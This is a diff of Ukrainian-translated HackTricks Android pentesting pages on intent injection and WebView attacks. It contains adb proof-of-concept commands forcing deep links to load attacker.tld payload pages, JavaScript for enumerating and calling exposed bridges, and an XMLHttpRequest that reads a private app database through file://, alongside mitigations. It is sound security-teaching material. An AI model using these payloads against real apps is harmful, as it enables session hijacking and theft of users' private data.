Translated ['src/mobile-pentesting/android-app-pentesting/intent-injecti

src/mobile-pentesting/android-app-pentesting/intent-injection.md

@@ -1,5 +1,64 @@
-{{#include ../../banners/hacktricks-training.md}}
-
-**Подивіться на: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
+# Intent Injection
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Впровадження Intent зловживає компонентами, які приймають Intents або дані, контрольовані атакуючим, які пізніше перетворюються на Intents. Два дуже поширені шаблони під час тестування Android-додатків:
+
+- Передача спеціально підготовлених додаткових даних до експортованих Activities/Services/BroadcastReceivers, які пізніше пересилаються до привілейованих, неекспортованих компонентів.
+- Виклик експортованих VIEW/BROWSABLE глибоких посилань, які пересилають URL-адреси, контрольовані атакуючим, у внутрішні WebViews або інші чутливі місця.
+
+## Deep links → WebView sink (URL parameter injection)
+
+Якщо додаток відкриває глибоке посилання з користувацькою схемою, таке як:
+```text
+myscheme://com.example.app/web?url=<attacker_url>
+```
+і отримуюча Activity пересилає параметр запиту `url` у WebView, ви можете примусити додаток відобразити довільний віддалений контент у своєму контексті WebView.
+
+PoC через adb:
+```bash
+# Implicit VIEW intent
+adb shell am start -a android.intent.action.VIEW \
+-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+
+# Or explicitly target an Activity
+adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
+-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+```
+Impact
+- HTML/JS виконується всередині профілю WebView додатку.
+- Якщо JavaScript увімкнено (за замовчуванням або через неправильний порядок перевірок), ви можете перерахувати/використовувати будь-які відкриті `@JavascriptInterface` об'єкти, вкрасти куки WebView/локальне сховище та здійснити поворот.
+
+Дивіться також:
+
+{{#ref}}
+webview-attacks.md
+{{#endref}}
+
+## Помилка порядку перевірок, що дозволяє JavaScript
+
+Постійна помилка полягає в увімкненні JavaScript (або інших дозволяючих налаштувань WebView) до завершення остаточної перевірки списку дозволених URL. Якщо ранні допоміжні функції приймають ваш глибокий посилання, а WebView налаштовано спочатку, ваше остаточне завантаження відбувається з уже увімкненим JavaScript, навіть якщо пізні перевірки є ненадійними або запізнілими.
+
+На що звернути увагу в декомпільованому коді:
+- Кілька допоміжних функцій, які по-різному аналізують/розділяють/перебудовують URL (неконсистентна нормалізація).
+- Виклики `getSettings().setJavaScriptEnabled(true)` перед останньою перевіркою списку дозволених хостів/шляхів.
+- Конвеєр на кшталт: аналіз → часткова валідація → налаштування WebView → остаточна перевірка → loadUrl.
+
+Mitigations
+- Канонізуйте один раз і строго перевіряйте; закривайте при невдачі.
+- Увімкніть JavaScript лише після проходження всіх перевірок і безпосередньо перед завантаженням довіреного контенту.
+- Уникайте відкриття мостів для ненадійних джерел.
+
+## Інші класичні примітиви ін'єкції Intent
+
+- startActivity/sendBroadcast з використанням `Intent` екстра, наданих атакуючими, які пізніше повторно аналізуються (`Intent.parseUri(...)`) і виконуються.
+- Експортовані проксі-компоненти, які пересилають Intents до неекспортованих чутливих компонентів без перевірок дозволів.
+
+## References
+
+- [Android – Доступ до компонентів, захищених додатком](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
+- [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
+- [Pwn2Own Ireland 2024 – Ланцюг атак Samsung S24 (біла книга)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
+- [Демонстраційне відео](https://www.youtube.com/watch?v=LAIr2laU-So)
 
 {{#include ../../banners/hacktricks-training.md}}

src/mobile-pentesting/android-app-pentesting/webview-attacks.md

@@ -31,11 +31,11 @@
 
 #### **WebViewAssetLoader**
 
-Клас **WebViewAssetLoader** є сучасним підходом для завантаження локальних файлів. Він використовує http(s) URL для доступу до локальних активів і ресурсів, узгоджуючись з політикою Same-Origin, що полегшує управління CORS.
+Клас **WebViewAssetLoader** є сучасним підходом для завантаження локальних файлів. Він використовує http(s) URL для доступу до локальних активів і ресурсів, узгоджуючись з політикою того ж походження, що полегшує управління CORS.
 
 ### loadUrl
 
-Це загальна функція, що використовується для завантаження довільних URL у webviwe:
+Це загальна функція, що використовується для завантаження довільних URL в webviwe:
 ```java
 webview.loadUrl("<url here>")
 ```
@@ -43,8 +43,8 @@ webview.loadUrl("<url here>")
 
 ### **Обробка JavaScript та Intent Scheme**
 
-- **JavaScript**: За замовчуванням вимкнений у WebViews, його можна увімкнути за допомогою `setJavaScriptEnabled()`. Рекомендується бути обережним, оскільки увімкнення JavaScript без належних запобіжних заходів може призвести до вразливостей безпеки.
-- **Intent Scheme**: WebViews можуть обробляти схему `intent`, що потенційно може призвести до експлуатації, якщо не управляти нею обережно. Прикладом вразливості є відкритий параметр WebView "support_url", який може бути використаний для виконання атак між сайтами (XSS).
+- **JavaScript**: Вимкнено за замовчуванням у WebViews, його можна увімкнути за допомогою `setJavaScriptEnabled()`. Рекомендується бути обережним, оскільки увімкнення JavaScript без належних запобіжних заходів може призвести до вразливостей безпеки.
+- **Intent Scheme**: WebViews можуть обробляти схему `intent`, що потенційно може призвести до експлуатації, якщо не управляти нею обережно. Приклад вразливості пов'язаний з відкритим параметром WebView "support_url", який можна експлуатувати для виконання атак міжсайтового скриптування (XSS).
 
 ![Vulnerable WebView](<../../images/image (1191).png>)
 
@@ -96,7 +96,7 @@ if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
 WebView.setWebContentsDebuggingEnabled(true);
 }
 ```
-- Щоб умовно увімкнути налагодження на основі стану налагоджуваності програми:
+- Щоб умовно увімкнути налагодження на основі стану налагодження програми:
 ```java
 if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
 if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
@@ -120,12 +120,234 @@ true
 )
 xhr.send(null)
 ```
-## Посилання
+# Webview Attacks
 
-- [https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
-- [https://github.com/authenticationfailure/WheresMyBrowser.Android](https://github.com/authenticationfailure/WheresMyBrowser.Android)
-- [https://developer.android.com/reference/android/webkit/WebView](https://developer.android.com/reference/android/webkit/WebView)
-- [https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
-- [https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
+
+
+## Guide on WebView Configurations and Security
+
+### Overview of WebView Vulnerabilities
+
+Критичним аспектом розробки для Android є правильне оброблення WebViews. Цей посібник підкреслює ключові конфігурації та практики безпеки для зменшення ризиків, пов'язаних з використанням WebView.
+
+![WebView Example](<../../images/image (1190).png>)
+
+### **File Access in WebViews**
+
+За замовчуванням WebViews дозволяють доступ до файлів. Ця функціональність контролюється методом `setAllowFileAccess()`, доступним з рівня API Android 3 (Cupcake 1.5). Додатки з дозволом **android.permission.READ_EXTERNAL_STORAGE** можуть читати файли з зовнішнього сховища, використовуючи схему URL файлу (`file://path/to/file`).
+
+#### **Deprecated Features: Universal and File Access From URLs**
+
+- **Universal Access From File URLs**: Ця застаріла функція дозволяла крос-доменні запити з URL файлів, що становило значний ризик безпеки через потенційні атаки XSS. Налаштування за замовчуванням вимкнено (`false`) для додатків, що націлені на Android Jelly Bean та новіші версії.
+- Щоб перевірити це налаштування, використовуйте `getAllowUniversalAccessFromFileURLs()`.
+- Щоб змінити це налаштування, використовуйте `setAllowUniversalAccessFromFileURLs(boolean)`.
+- **File Access From File URLs**: Ця функція, також застаріла, контролювала доступ до вмісту з інших URL схем файлів. Як і універсальний доступ, її значення за замовчуванням вимкнено для підвищення безпеки.
+- Використовуйте `getAllowFileAccessFromFileURLs()` для перевірки та `setAllowFileAccessFromFileURLs(boolean)` для налаштування.
+
+#### **Secure File Loading**
+
+Для вимкнення доступу до файлової системи, одночасно отримуючи доступ до активів і ресурсів, використовується метод `setAllowFileAccess()`. З Android R і вище, налаштування за замовчуванням - `false`.
+
+- Перевірте за допомогою `getAllowFileAccess()`.
+- Увімкніть або вимкніть за допомогою `setAllowFileAccess(boolean)`.
+
+#### **WebViewAssetLoader**
+
+Клас **WebViewAssetLoader** є сучасним підходом для завантаження локальних файлів. Він використовує http(s) URL для доступу до локальних активів і ресурсів, узгоджуючись з політикою Same-Origin, що полегшує управління CORS.
+
+### loadUrl
+
+Це загальна функція, що використовується для завантаження довільних URL у webviwe:
+```java
+webview.loadUrl("<url here>")
+```
+Звичайно, потенційний атакуючий ніколи не повинен мати можливість **контролювати URL**, який завантажує додаток.
+
+### Глибоке посилання в внутрішній WebView (кастомна схема → WebView sink)
+
+Багато додатків реєструють кастомні схеми/шляхи, які перенаправляють URL, наданий користувачем, в WebView всередині додатка. Якщо глибоке посилання експортується (VIEW + BROWSABLE), атакуючий може змусити додаток відобразити довільний віддалений контент у контексті його WebView.
+
+Типовий шаблон маніфесту (спрощений):
+```xml
+<activity android:name=".MainActivity" android:exported="true">
+<intent-filter>
+<action android:name="android.intent.action.VIEW" />
+<category android:name="android.intent.category.DEFAULT" />
+<category android:name="android.intent.category.BROWSABLE" />
+<data android:scheme="myscheme" android:host="com.example.app" />
+</intent-filter>
+</activity>
+```
+Загальний потік коду (спрощений):
+```java
+// Entry activity
+@Override
+protected void onNewIntent(Intent intent) {
+Uri deeplink = intent.getData();
+String url = deeplink.getQueryParameter("url"); // attacker-controlled
+if (deeplink.getPathSegments().get(0).equals("web")) {
+Intent i = new Intent(this, WebActivity.class);
+i.putExtra("url", url);
+startActivity(i);
+}
+}
+
+// WebActivity sink
+webView.loadUrl(getIntent().getStringExtra("url"));
+```
+Шаблон атаки та PoC через adb:
+```bash
+# Template – force load in internal WebView
+adb shell am start -a android.intent.action.VIEW \
+-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+
+# If a specific Activity must be targeted
+adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
+-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+```
+Вплив: віддалена сторінка працює в контексті WebView додатку (куки/сесія профілю WebView додатку, доступ до будь-якого відкритого @JavascriptInterface, потенційний доступ до content:// та file:// в залежності від налаштувань).
+
+Поради для полювання:
+- Grep декомпільовані джерела на `getQueryParameter("url")`, `loadUrl(`, `WebView` sinks, та обробники глибоких посилань (`onCreate/onNewIntent`).
+- Перегляньте маніфест на наявність фільтрів VIEW+BROWSABLE та користувацьких схем/хостів, які відображаються на активності, що пізніше запускає WebView.
+- Перевірте, чи є кілька шляхів глибоких посилань (наприклад, шлях "зовнішнього браузера" проти "внутрішнього webview") і надайте перевагу тому, що відображається всередині додатку.
+
+### Увімкнення JavaScript перед перевіркою (помилка порядку перевірок)
+
+Частою помилкою зміцнення є увімкнення JavaScript або налаштування розслаблених параметрів WebView перед завершенням остаточного списку дозволених/перевірки цільового URL. Якщо перевірка є непослідовною між допоміжними засобами або відбувається занадто пізно, зловмисник може отримати доступ до стану, де:
+
+1) Налаштування WebView застосовуються (наприклад, `setJavaScriptEnabled(true)`), і
+2) Ненадійний URL завантажується з увімкненим JavaScript.
+
+Шаблон помилки (псевдокод):
+```java
+// 1) Parse/early checks
+Uri u = parse(intent);
+if (!looksValid(u)) return;
+
+// 2) Configure WebView BEFORE final checks
+webView.getSettings().setJavaScriptEnabled(true); // BAD: too early
+configureMixedContent();
+
+// 3) Do final verification (late)
+if (!finalAllowlist(u)) return; // too late – JS already enabled
+
+// 4) Load
+webView.loadUrl(u.toString());
+```
+Чому це вразливо
+- Непослідовна нормалізація: допоміжні засоби розділяють/перебудовують URL по-різному, ніж фінальна перевірка, створюючи невідповідності, які може експлуатувати шкідливий URL.
+- Неправильний порядок виконання: увімкнення JS на етапі 2 застосовується глобально до екземпляра WebView, впливаючи на фінальне завантаження, навіть якщо перевірка пізніше зазнає невдачі.
+
+Як протестувати
+- Створіть глибокі посилання, які проходять ранні перевірки і досягають сайту конфігурації WebView.
+- Використовуйте adb для запуску неявних намірів VIEW, які передають параметр `url=`, контрольований вами:
+```bash
+adb shell am start -a android.intent.action.VIEW \
+-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
+```
+Якщо експлуатація успішна, ваш вантаж виконує JavaScript у WebView додатку. Звідти досліджуйте відкриті мости:
+```html
+<script>
+for (let k in window) {
+try { if (typeof window[k] === 'object' || typeof window[k] === 'function') console.log('[JSI]', k); } catch(e){}
+}
+</script>
+```
+Захисні рекомендації
+- Канонізуйте один раз; строго перевіряйте проти єдиного джерела правди (схема/хост/шлях/запит).
+- Викликайте `setJavaScriptEnabled(true)` лише після проходження всіх перевірок у білому списку і безпосередньо перед завантаженням довіреного контенту.
+- Уникайте відкриття `@JavascriptInterface` для ненадійних джерел; надавайте перевагу контролю за кожним джерелом.
+- Розгляньте можливість використання окремих екземплярів WebView для довіреного та ненадійного контенту, з вимкненим JS за замовчуванням.
+
+### **Обробка JavaScript та Intent Scheme**
+
+- **JavaScript**: Вимкнений за замовчуванням у WebViews, його можна увімкнути за допомогою `setJavaScriptEnabled()`. Рекомендується обережність, оскільки увімкнення JavaScript без належних запобіжних заходів може призвести до вразливостей безпеки.
+- **Intent Scheme**: WebViews можуть обробляти схему `intent`, що потенційно може призвести до експлуатації, якщо не управляти нею обережно. Приклад вразливості включав відкритий параметр WebView "support_url", який можна було експлуатувати для виконання атак міжсайтового скриптування (XSS).
+
+![Vulnerable WebView](<../../images/image (1191).png>)
+
+Приклад експлуатації з використанням adb:
+```bash
+adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView –es support_url "https://example.com/xss.html"
+```
+### Javascript Bridge
+
+Функція, що надається Android, дозволяє **JavaScript** у WebView викликати **функції рідного Android додатку**. Це досягається за допомогою методу `addJavascriptInterface`, який інтегрує JavaScript з рідними функціональностями Android, що називається _WebView JavaScript bridge_. Рекомендується бути обережним, оскільки цей метод дозволяє всім сторінкам у WebView отримувати доступ до зареєстрованого об'єкта JavaScript Interface, що становить ризик безпеки, якщо чутлива інформація буде розкрита через ці інтерфейси.
+
+- **Вимагається крайня обережність** для додатків, що націлені на версії Android нижче 4.2 через вразливість, що дозволяє віддалене виконання коду через шкідливий JavaScript, експлуатуючи рефлексію.
+
+#### Implementing a JavaScript Bridge
+
+- **JavaScript інтерфейси** можуть взаємодіяти з рідним кодом, як показано в прикладах, де метод класу відкритий для JavaScript:
+```javascript
+@JavascriptInterface
+public String getSecret() {
+return "SuperSecretPassword";
+};
+```
+- JavaScript Bridge активується шляхом додавання інтерфейсу до WebView:
+```javascript
+webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge")
+webView.reload()
+```
+- Потенційна експлуатація через JavaScript, наприклад, через атаку XSS, дозволяє викликати відкриті Java методи:
+```html
+<script>
+alert(javascriptBridge.getSecret())
+</script>
+```
+- Щоб зменшити ризики, **обмежте використання JavaScript bridge** кодом, що постачається з APK, і забороніть завантаження JavaScript з віддалених джерел. Для старіших пристроїв встановіть мінімальний рівень API на 17.
+
+### Виконання віддаленого коду на основі рефлексії (RCE)
+
+- Документований метод дозволяє досягти RCE через рефлексію, виконуючи специфічний payload. Однак анотація `@JavascriptInterface` запобігає несанкціонованому доступу до методів, обмежуючи поверхню атаки.
+
+### Віддалене налагодження
+
+- **Віддалене налагодження** можливе за допомогою **Chrome Developer Tools**, що дозволяє взаємодіяти та виконувати довільний JavaScript у вмісті WebView.
+
+#### Увімкнення віддаленого налагодження
+
+- Віддалене налагодження можна увімкнути для всіх WebView в додатку, виконавши:
+```java
+if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
+WebView.setWebContentsDebuggingEnabled(true);
+}
+```
+- Щоб умовно увімкнути налагодження на основі стану налагодження програми:
+```java
+if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
+if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
+{ WebView.setWebContentsDebuggingEnabled(true); }
+}
+```
+## Екстракція довільних файлів
+
+- Демонструє екстракцію довільних файлів за допомогою XMLHttpRequest:
+```javascript
+var xhr = new XMLHttpRequest()
+xhr.onreadystatechange = function () {
+if (xhr.readyState == XMLHttpRequest.DONE) {
+alert(xhr.responseText)
+}
+}
+xhr.open(
+"GET",
+"file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db",
+true
+)
+xhr.send(null)
+```
+## References
+
+- [Огляд векторів атак на доступ до файлів Android WebViews](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
+- [WheresMyBrowser.Android (демо-додаток)](https://github.com/authenticationfailure/WheresMyBrowser.Android)
+- [Посилання на Android WebView](https://developer.android.com/reference/android/webkit/WebView)
+- [Глибокі посилання та експлуатація WebViews – Частина II](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
+- [Глибокі посилання та експлуатація WebViews – Частина I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
+- [Ланцюг експлуатації Samsung S24 Pwn2Own 2024 – покрокове керівництво](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
+- [Pwn2Own Ірландія 2024 – ланцюг атак Samsung S24 (біла книга)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
+- [Відео демонстрації](https://www.youtube.com/watch?v=LAIr2laU-So)
 
 {{#include ../../banners/hacktricks-training.md}}